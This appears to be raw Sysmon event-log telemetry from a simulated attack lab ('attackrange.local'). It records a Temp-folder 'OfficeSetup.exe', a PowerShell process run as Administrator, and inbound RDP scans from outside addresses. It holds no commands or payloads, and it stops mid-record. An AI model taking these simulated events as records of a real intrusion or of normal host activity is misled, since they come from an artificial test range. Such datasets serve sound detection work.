14:53:33.472{A7A01FEF-C0A6-607E-8105-00000000BB01}8362304C:\Windows\Explorer.EXE{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e4e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063008Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:33.472{A7A01FEF-C0A6-607E-8105-00000000BB01}8362304C:\Windows\Explorer.EXE{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063007Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:33.472{A7A01FEF-C0A6-607E-7B05-00000000BB01}18804408C:\Windows\system32\taskhostw.exe{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063006Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:33.472{A7A01FEF-C0A6-607E-7B05-00000000BB01}18804408C:\Windows\system32\taskhostw.exe{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063005Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:33.472{A7A01FEF-C0A6-607E-8105-00000000BB01}8366128C:\Windows\Explorer.EXE{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+62f35|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063004Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:33.472{A7A01FEF-C0A6-607E-8105-00000000BB01}8366128C:\Windows\Explorer.EXE{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e4e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063003Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:33.472{A7A01FEF-C0A6-607E-8105-00000000BB01}8366128C:\Windows\Explorer.EXE{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063002Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:33.472{A7A01FEF-C0A6-607E-8105-00000000BB01}8366128C:\Windows\Explorer.EXE{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063001Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:33.472{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+628b0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063000Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:33.472{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bd0|C:\Windows\System32\SHELL32.dll+6286c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062999Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:33.472{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62840|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062998Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:33.472{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000062997Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:33.300{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2F862EE62AC4E3FE3C30F7B9C6B57929,SHA256=9DBABA15FBAD409C8B33821EF863C938387DA7F800F09A53C6DA0CD1ECD76326,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000062996Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:33.222{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062995Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:33.222{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000062994Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:33.129{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB96D2842ED4C900A4CAB13195C2FE9F,SHA256=6872575D8811775CC68B4465A171BA62BE3A46F4C22B2C448EB5E810ADC34891,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000062993Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:31.279{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57444-false10.0.1.12-8000- 354300x800000000000000062992Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:31.135{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-45937-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000049277Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:34.723{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=096835B2AE33E219E1B23042B7DB1AF4,SHA256=A14022DB87123F42C02109572B8924108F75157DABD8C6B2E67F802CFB85B70E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000063042Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:34.910{A7A01FEF-B626-607E-1600-00000000BB01}15402060C:\Windows\system32\svchost.exe{A7A01FEF-EAED-607E-670B-00000000BB01}3712C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063041Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:34.910{A7A01FEF-B626-607E-1600-00000000BB01}15401640C:\Windows\system32\svchost.exe{A7A01FEF-EAED-607E-670B-00000000BB01}3712C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063040Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:34.863{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EAED-607E-670B-00000000BB01}3712C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063039Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:34.863{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EAED-607E-670B-00000000BB01}3712C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x800000000000000063038Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-CreatePipe2021-04-20 14:53:34.785{A7A01FEF-EAED-607E-670B-00000000BB01}3712\PSHost.132634040136275934.3712.DefaultAppDomain.powershellC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000063037Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:34.769{A7A01FEF-EAED-607E-670B-00000000BB01}3712ATTACKRANGE\AdministratorC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_vq1ni4af.r3x.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063036Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:34.769{A7A01FEF-EAED-607E-670B-00000000BB01}3712ATTACKRANGE\AdministratorC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_cnnvyzmg.sf3.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063035Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:34.628{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=607FBB878AE0BCE24AEE5BB12AF4B468,SHA256=2469225F1E8BEBF95D6087B068DCE0D4A34EB464A7330185D358FA7813977701,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000063034Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:34.519{A7A01FEF-EAED-607E-670B-00000000BB01}3712C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_cnnvyzmg.sf3.ps12021-04-20 14:53:34.519 10341000x800000000000000063033Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:34.488{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EAED-607E-670B-00000000BB01}3712C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000063032Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:34.207{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF0685FC2EDBFCEF10F70D3FA0FA4AE8,SHA256=5592B7797E0FE8D98615041721CED3E4DEDA8FF29A20893DE50FAB353ADF0CE1,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049276Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:32.241{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-54850-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049275Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:32.098{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com62426-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049274Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:32.038{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-51901-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000063031Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:32.596{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com62691-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000063030Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:32.494{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-50044-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000049279Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:35.725{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC667B345F21DBF773210C42256A29F2,SHA256=915787DD1AB210FA6AF72C5E363C6AD82180F84FB03815DE1C1544ADBA525C9E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063080Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:35.972{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F0F9B7CF52354E4267EBF9E15FD197D0,SHA256=230809D4E247592ADA92A3353D2A467DF59AECFB80DE4FEDC9EDBEC733ACF84F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000063079Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:35.941{A7A01FEF-B626-607E-1600-00000000BB01}15402060C:\Windows\system32\svchost.exe{A7A01FEF-EAEF-607E-6B0B-00000000BB01}1580C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063078Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:35.941{A7A01FEF-B626-607E-1600-00000000BB01}15401640C:\Windows\system32\svchost.exe{A7A01FEF-EAEF-607E-6B0B-00000000BB01}1580C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063077Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:35.941{A7A01FEF-EAEF-607E-6B0B-00000000BB01}1580944C:\Windows\system32\conhost.exe{A7A01FEF-EAEF-607E-6A0B-00000000BB01}4924C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063076Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:35.925{A7A01FEF-C0A3-607E-6C05-00000000BB01}36244292C:\Windows\system32\csrss.exe{A7A01FEF-EAEF-607E-6B0B-00000000BB01}1580C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000063075Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 